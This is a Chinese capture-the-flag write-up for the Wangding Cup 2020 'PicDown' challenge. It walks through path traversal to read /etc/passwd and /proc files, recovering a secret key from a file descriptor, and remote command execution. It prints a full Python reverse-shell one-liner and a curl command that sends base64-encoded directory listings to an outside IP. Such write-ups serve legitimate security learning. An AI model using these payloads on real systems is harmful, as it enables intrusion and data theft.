[網鼎杯 2020 白虎組]PicDown
阿新 • • 發佈:2021-01-09
技術標籤:檔案包含模板注入SSTI命令執行pythonbash資訊保安shell
知識點
- 檔案讀取
- 檔案描述符
- python程式碼審計
- 反彈shell
WP
總的來說還是一道比較簡單的題目,有毒的地方就是那個url,我卡在那個url上面了,我真的以為這是一個SSRF,沒想過去試試直接檔案讀取,沒想到真的這樣:
?url=../../../../../etc/passwd
可以讀到東西。雖然我也嘗試過用file,但是沒讀到東西,看來是被過濾了,還是自己的基礎知識掌握的太差了。
可以讀檔案後就進行讀,然後就發現直接讀到了flag。。。。:
?url=../../../../../flag
是環境的問題,網鼎杯比賽的時候flag檔案在其他的地方。
/proc/self/environ
/proc/self/cmdline
可以讀到python2 app.py
,然後我們讀一下/proc/self/cwd/app.py
from flask import Flask, Response
from flask import render_template
from flask import request
import os
import urllib
app = Flask(__name__)
SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)
@app.route('/')
def index():
return render_template('search.html')
@app.route('/page')
def page():
url = request.args.get("url")
try:
if not url.lower().startswith("file"):
res = urllib.urlopen(url)
value = res.read()
response = Response(value, mimetype='application/octet-stream')
response.headers['Content-Disposition'] = 'attachment; filename=beautiful.jpg'
return response
else:
value = "HACK ERROR!"
except:
value = "SOMETHING WRONG!"
return render_template('search.html', res=value)
@app.route('/no_one_know_the_manager')
def manager():
key = request.args.get("key")
print(SECRET_KEY)
if key == SECRET_KEY:
shell = request.args.get("shell")
os.system(shell)
res = "ok"
else:
res = "Wrong Key!"
return res
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8080)
稍微審計一下程式碼,還是對檔案描述符的考察了,金鑰可以在/proc/self/fd/3
裡面讀到,然後傳入密碼和shell,就可以執行了。但是問題是沒有回顯,這題有兩種方式。一種是直接python反彈shell:
?key=YBb%2FolIX5h4ChHDJYy%2BhypD0MtKjJyIs3fI3Jbma1SY%3D&shell=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("118.***.***.***",39555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
然後直接讀flag就可以了:
還有一種是curl反彈shell:
?key=YBb%2FolIX5h4ChHDJYy%2BhypD0MtKjJyIs3fI3Jbma1SY%3D&shell=curl 118.***.***.***/`ls /|base64`
因為結果裡有換行,日誌裡只能顯示第一行的內容,所以還要base64加密一次:
再加密就可以得到完成的命令執行內容了,都可以得到flag。